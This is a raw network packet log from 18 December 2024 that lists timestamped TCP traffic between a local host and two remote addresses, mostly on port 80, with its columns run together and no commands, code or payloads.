                                                                                                                                                                                          Dec 18, 2024 09:07:31.574709892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.574753046 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.574754000 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.574790955 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.575803995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.575814009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.575858116 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.576710939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.576843977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.576884031 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.577721119 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.578073978 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.578126907 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.578793049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.578836918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.578986883 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.579756021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.579793930 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.579807043 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.579834938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.580725908 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.580782890 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.580840111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.581805944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.581815958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.581857920 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.582731962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.582876921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.582914114 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.582931042 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.583801031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.583837986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.583844900 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.583935976 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.584872007 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.584913969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.584914923 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.584949970 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.585824013 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.585866928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.585939884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.586054087 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.586822987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.586878061 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.586889029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.586932898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.587887049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.588048935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.588078022 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.588090897 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.588956118 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.588965893 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.589008093 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.590017080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.590032101 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.590075016 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591080904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591090918 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591129065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591840982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591901064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.591952085 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.592879057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.593200922 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.593242884 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.593882084 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.594026089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.594068050 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.594974995 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595010996 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595015049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595048904 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595906973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595944881 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.595997095 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.596043110 CET49722443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:31.596076965 CET44349722104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.596139908 CET49722443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:31.596970081 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.597008944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.597049952 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.598046064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.598295927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.598336935 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.599126101 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.599138021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.599164009 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.599189997 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.599951029 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.600018024 CET49722443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:31.600024939 CET44349722104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.600035906 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.600970984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.600984097 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.601033926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.601093054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.601716995 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.601993084 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.602034092 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.602319956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.602474928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.603007078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.603048086 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.603162050 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.603207111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.604124069 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.604167938 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.604234934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.604279995 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.605050087 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.605094910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.605506897 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.605957985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.606000900 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.743974924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744040012 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744092941 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744157076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744206905 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744299889 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.744343042 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.745894909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.745907068 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.745951891 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.746342897 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.746388912 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.746495008 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.746643066 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.747261047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.747304916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.747348070 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.747394085 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.748434067 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.748452902 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.748481989 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.748501062 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.749305964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.749349117 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.749639988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.749713898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.750339031 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.750411034 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.750919104 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.751025915 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.751362085 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.751403093 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.751669884 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.751713037 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.752296925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.752347946 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.752459049 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.752516031 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.753336906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.753375053 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.753412962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.753494978 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.754534960 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.754545927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.754581928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.754614115 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.755302906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.755347967 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.755477905 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.755556107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.756432056 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.756480932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.756652117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.756695032 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.757355928 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.757400990 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.757456064 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.757603884 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.758382082 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.758429050 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.758491993 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.758549929 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.759385109 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.759428978 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.759555101 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.759701967 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.760459900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.760514975 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.760551929 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.760667086 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.761497021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.761538029 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.761724949 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.761775017 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.762783051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.762794018 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.762831926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.762852907 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.763484001 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.763520956 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.763843060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.763983011 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.764646053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.764657021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.764699936 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.764719009 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.765500069 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.765615940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.765655041 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.766680956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.766733885 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.766798019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.766845942 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.767479897 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.767533064 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.767663956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.767707109 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.768737078 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.768747091 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.768785000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.768806934 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.769929886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.769942045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.769998074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.770591021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.770646095 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.770684958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.771541119 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.771590948 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.771598101 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.771662951 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.772532940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.772583008 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.772945881 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.772988081 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.773574114 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.773622990 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774024963 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774092913 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774605989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774652958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774727106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.774872065 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.775582075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.775654078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.775737047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.775785923 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.776614904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.776662111 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.776700974 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.776781082 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.777692080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.777704000 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.777749062 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.778770924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.778783083 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.778819084 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.778844118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.779880047 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.779891968 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.779932976 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.779961109 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.780958891 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.780968904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.781011105 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.781939983 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.781965017 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.782010078 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.782815933 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.782830000 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.782855034 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.782876015 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.783883095 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.783893108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.783931971 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.785005093 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.785016060 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.785060883 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.786062002 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.786072969 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.786117077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.787374020 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.787384987 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.787434101 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.787967920 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.787980080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.788032055 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.788738012 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.788780928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.789338112 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.789405107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.789786100 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.789856911 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790400982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790446043 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790741920 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790797949 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790862083 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.790904045 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.791830063 CET804972031.41.244.11192.168.2.8
